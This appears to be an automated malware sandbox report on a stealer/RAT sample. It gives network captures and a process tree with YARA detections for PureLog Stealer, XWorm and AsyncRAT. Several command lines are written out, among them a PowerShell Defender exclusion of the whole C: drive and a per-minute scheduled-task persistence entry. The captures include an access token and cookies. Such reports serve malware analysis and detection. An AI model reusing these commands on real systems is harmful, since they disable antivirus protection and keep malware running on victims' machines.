                                                                                                                                                                                                                2024-03-10 16:47:03 UTC4096INData Raw: 7d 2c 7b 22 61 70 70 69 64 22 3a 22 6f 68 63 6b 65 66 6c 6e 68 65 67 6f 6a 63 6a 6c 63 70 62 66 70 63 69 61 64 67 69 6b 63 6f 68 6b 22 2c 22 63 6f 68 6f 72 74 22 3a 22 22 2c 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 63 6f 68 6f 72 74 6e 61 6d 65 22 3a 22 22 2c 22 75 70 64 61 74 65 63 68 65 63 6b 22 3a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 75 72 6c 73 22 3a 7b 22 75 72 6c 22 3a 5b 7b 22 63 6f 64 65 62 61 73 65 22 3a 22 68 74 74 70 3a 2f 2f 6d 73 65 64 67 65 2e 62 2e 74 6c 75 2e 64 6c 2e 64 65 6c 69 76 65 72 79 2e 6d 70 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 72 65 61 6d 69 6e 67 73 65 72 76 69 63 65 2f 66 69 6c 65 73 2f 62 32 32 66 35 66 31 38 2d 66 37 65 61 2d 34 32 39 30 2d 39 32 39 64 2d 62 31 33 63 30 33 39 30 38 33
                                                                                                                                                                                                                Data Ascii: },{"appid":"ohckeflnhegojcjlcpbfpciadgikcohk","cohort":"","status":"ok","cohortname":"","updatecheck":{"status":"ok","urls":{"url":[{"codebase":"http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/b22f5f18-f7ea-4290-929d-b13c039083
                                                                                                                                                                                                                2024-03-10 16:47:03 UTC2443INData Raw: 61 73 68 46 69 6c 65 55 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 6d 73 65 64 67 65 2e 66 2e 64 6c 2e 64 65 6c 69 76 65 72 79 2e 6d 70 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 72 65 61 6d 69 6e 67 73 65 72 76 69 63 65 2f 66 69 6c 65 73 2f 34 61 33 63 34 39 36 39 2d 65 65 30 33 2d 34 35 64 37 2d 62 31 36 37 2d 63 37 66 32 33 30 36 66 66 30 64 31 2f 70 69 65 63 65 73 68 61 73 68 22 2c 22 48 61 73 68 4f 66 48 61 73 68 65 73 22 3a 22 38 52 4b 59 53 57 66 35 4c 6e 4a 39 4c 75 36 79 79 69 7a 31 76 5a 2b 39 70 43 41 49 75 30 44 38 41 76 72 6c 51 78 52 34 62 62 41 3d 22 7d 7d 7d 7d 5d 7d 2c 22 61 72 67 75 6d 65 6e 74 73 22 3a 22 22 7d 7d 7d 2c 7b 22 61 70 70 69 64 22 3a 22 6e 64 69 6b 70 6f 6a 63 6a 6c 65 70 6f 66 64 6b 61 61 6c 64 6b 69 6e 6b 6a
                                                                                                                                                                                                                Data Ascii: ashFileUrl":"http://msedge.f.dl.delivery.mp.microsoft.com/filestreamingservice/files/4a3c4969-ee03-45d7-b167-c7f2306ff0d1/pieceshash","HashOfHashes":"8RKYSWf5LnJ9Lu6yyiz1vZ+9pCAIu0D8AvrlQxR4bbA="}}}}]},"arguments":""}}},{"appid":"ndikpojcjlepofdkaaldkinkj


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                18192.168.2.44978131.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:47:17 UTC590OUTGET /ws/chat HTTP/1.1
                                                                                                                                                                                                                Host: web.whatsapp.com
                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                Origin: https://web.whatsapp.com
                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gs
                                                                                                                                                                                                                Sec-WebSocket-Key: 1wgP648fMest6+AY5jmUYg==
                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                2024-03-10 16:47:17 UTC63INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:47:17 GMT
                                                                                                                                                                                                                2024-03-10 16:47:17 UTC2595INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 4b 66 44 49 5f 70 33 44 4f 59 76 61 2d 6e 48 6c 4b 30 7a 49 5a 67 58 52 31 4a 54 67 75 37 69 4b 2d 78 77 56 6e 48 6e 5f 52 76 6a 39 44 6e 41 30 5a 38 41 50 48 57 54 54 58 50 2d 41 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 49 5f 36 67 32 44 4e 43 63 75 34 2d 50 67 38 6d 56 6f 79 33 30 49 48 37 5a 6f 34 72 6d 54 37 79 6f 6c 4e 45 31 55 6b 6f 58 51 47 6c 35 53 34 6a 55 42 37 70 41 63 36 70 4f 6b 4b 36 73 42 57 43 6b 75 52 51 74 46 78 4c 42 6c 78 41 36 70 54 67 45 43 47 7a 45 75 38 6e 71 74 37 4f 35 65 41 43 39 72 6e 6f 47 56 62 41 46 5a 39 69 6d 6c 69 51 22 3b 20 65 5f 66 62 5f
                                                                                                                                                                                                                Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcKfDI_p3DOYva-nHlK0zIZgXR1JTgu7iK-xwVnHn_Rvj9DnA0Z8APHWTTXP-A"; e_clientaddr="AcI_6g2DNCcu4-Pg8mVoy30IH7Zo4rmT7yolNE1UkoXQGl5S4jUB7pAc6pOkK6sBWCkuRQtFxLBlxA6pTgECGzEu8nqt7O5eAC9rnoGVbAFZ9imliQ"; e_fb_


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                19192.168.2.44978231.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:47:34 UTC822OUTPOST /wa_fls_upload_check?type=crashlog&access_token=1063127757113399%7C745146ffa34413f9dbb5469f5370b7af HTTP/1.1
                                                                                                                                                                                                                Host: crashlogs.whatsapp.net
                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                Content-Length: 636
                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"
                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFCLnhzuJaG5Kx792
                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                Origin: https://web.whatsapp.com
                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                Referer: https://web.whatsapp.com/
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                2024-03-10 16:47:34 UTC636OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 46 43 4c 6e 68 7a 75 4a 61 47 35 4b 78 37 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 67 65 6e 74 22 0d 0a 0d 0a 57 68 61 74 73 41 70 70 2f 32 2e 32 34 31 30 2e 31 20 57 65 62 2f 45 64 67 65 20 31 31 37 2e 30 2e 32 30 34 35 2e 34 37 20 44 65 76 69 63 65 2f 57 69 6e 64 6f 77 73 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 46 43 4c 6e 68 7a 75 4a 61 47 35 4b 78 37 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 70 70 5f 69 64 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72
                                                                                                                                                                                                                Data Ascii: ------WebKitFormBoundaryFCLnhzuJaG5Kx792Content-Disposition: form-data; name="agent"WhatsApp/2.2410.1 Web/Edge 117.0.2045.47 Device/Windows------WebKitFormBoundaryFCLnhzuJaG5Kx792Content-Disposition: form-data; name="app_id"------WebKitFor
                                                                                                                                                                                                                2024-03-10 16:47:34 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                facebook-api-version: v13.0
                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                                                Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                                                x-fb-request-id: A2NKU-IJQN5a0rZ67pVzcua
                                                                                                                                                                                                                x-fb-trace-id: DUbBEGCeIaf
                                                                                                                                                                                                                x-fb-rev: 1011957409
                                                                                                                                                                                                                X-FB-Debug: FvsZqoq9S5Om5RBqMNCX+AZHvUQKig0nOOqynFSIFrE4kpXHVUBtsvx2EMQzQ2mvnpI10vZTbLNtH9u6klLUQQ==
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:47:34 GMT
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Content-Length: 64
                                                                                                                                                                                                                2024-03-10 16:47:34 UTC64INData Raw: 7b 0a 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 22 31 22 2c 0a 20 20 20 22 63 6f 6e 66 69 67 22 3a 20 7b 0a 20 20 20 20 20 20 22 73 61 6d 70 6c 69 6e 67 22 3a 20 31 30 30 0a 20 20 20 7d 0a 7d
                                                                                                                                                                                                                Data Ascii: { "success": "1", "config": { "sampling": 100 }}


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                20192.168.2.44978331.13.65.494433352C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2024-03-10 16:47:51 UTC590OUTGET /ws/chat HTTP/1.1
                                                                                                                                                                                                                Host: web.whatsapp.com
                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                                Origin: https://web.whatsapp.com
                                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gs
                                                                                                                                                                                                                Sec-WebSocket-Key: +m2qXoJ+DyJyVTck/f10Hg==
                                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                                2024-03-10 16:47:51 UTC63INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                Date: Sun, 10 Mar 2024 16:47:51 GMT
                                                                                                                                                                                                                2024-03-10 16:47:51 UTC2595INData Raw: 50 72 6f 78 79 2d 53 74 61 74 75 73 3a 20 68 74 74 70 5f 72 65 71 75 65 73 74 5f 65 72 72 6f 72 3b 20 65 5f 66 62 5f 63 6f 6e 66 69 67 76 65 72 73 69 6f 6e 3d 22 41 63 4c 5f 54 31 39 41 65 6d 73 6a 72 52 65 75 76 5a 70 68 77 42 32 30 41 62 73 73 64 36 45 42 4a 4d 78 5f 74 4b 63 4b 32 79 55 58 4e 45 30 61 49 4d 36 66 52 63 74 50 6f 41 6e 7a 59 67 22 3b 20 65 5f 63 6c 69 65 6e 74 61 64 64 72 3d 22 41 63 4a 38 61 46 73 5f 33 39 6f 30 4f 6c 47 59 6c 6a 77 69 68 4c 45 41 4b 59 4a 4f 57 39 33 6c 47 34 45 50 6d 43 2d 6e 39 54 36 5a 4c 30 4b 58 56 57 6e 70 63 59 5a 71 4f 53 58 6f 59 53 56 51 48 65 6e 2d 55 7a 52 36 47 77 30 61 4c 49 31 44 47 68 31 51 39 58 61 58 35 6b 46 50 39 6a 4c 72 49 31 47 55 32 4c 58 32 5f 2d 43 4b 45 6c 79 66 52 41 22 3b 20 65 5f 66 62 5f
                                                                                                                                                                                                                Data Ascii: Proxy-Status: http_request_error; e_fb_configversion="AcL_T19AemsjrReuvZphwB20Abssd6EBJMx_tKcK2yUXNE0aIM6fRctPoAnzYg"; e_clientaddr="AcJ8aFs_39o0OlGYljwihLEAKYJOW93lG4EPmC-n9T6ZL0KXVWnpcYZqOSXoYSVQHen-UzR6Gw0aLI1DGh1Q9XaX5kFP9jLrI1GU2LX2_-CKElyfRA"; e_fb_


                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                Start time:17:45:00
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe
                                                                                                                                                                                                                Imagebase:0x460000
                                                                                                                                                                                                                File size:3'511'296 bytes
                                                                                                                                                                                                                MD5 hash:F24A4D5B6036A3DE2EBA88868BD771F2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2053224069.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2077594079.0000000007E18000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2053224069.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2053224069.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2053863237.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                Start time:17:45:01
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                Start time:17:45:01
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                Start time:17:45:01
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:powershell set-mppreference -exclusionpath C:\
                                                                                                                                                                                                                Imagebase:0x3b0000
                                                                                                                                                                                                                File size:433'152 bytes
                                                                                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                Start time:17:45:33
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe"
                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                File size:3'178'277 bytes
                                                                                                                                                                                                                MD5 hash:C9C01FDC7D3AD84CEEB43C6B099A8AD5
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                Start time:17:45:35
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                Imagebase:0x840000
                                                                                                                                                                                                                File size:56'368 bytes
                                                                                                                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.3711384740.0000000007760000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.3640012189.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.3640012189.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                Start time:17:45:40
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Imagebase:0x4a0000
                                                                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                Start time:17:45:40
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                Start time:17:45:41
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                Imagebase:0x810000
                                                                                                                                                                                                                File size:56'368 bytes
                                                                                                                                                                                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                Start time:17:45:41
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                Start time:17:45:44
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\WinUpdate.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\WinUpdate.exe"
                                                                                                                                                                                                                Imagebase:0xcf0000
                                                                                                                                                                                                                File size:3'511'296 bytes
                                                                                                                                                                                                                MD5 hash:F24A4D5B6036A3DE2EBA88868BD771F2
                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                Start time:17:45:45
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Windows\SysWOW64\cmd.exe" /k START "" "C:\Users\user\AppData\Local\WinUpdate.exe" & EXIT
                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                Start time:17:45:45
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                General

                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                Start time:17:45:45
                                                                                                                                                                                                                Start date:10/03/2024
                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\WinUpdate.exe
                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\WinUpdate.exe"
                                                                                                                                                                                                                Imagebase:0x110000
                                                                                                                                                                                                                File size:3'511'296 bytes
                                                                                                                                                                                                                MD5 hash:F24A4D5B6036A3DE2EBA88868BD771F2
                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.2489538224.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
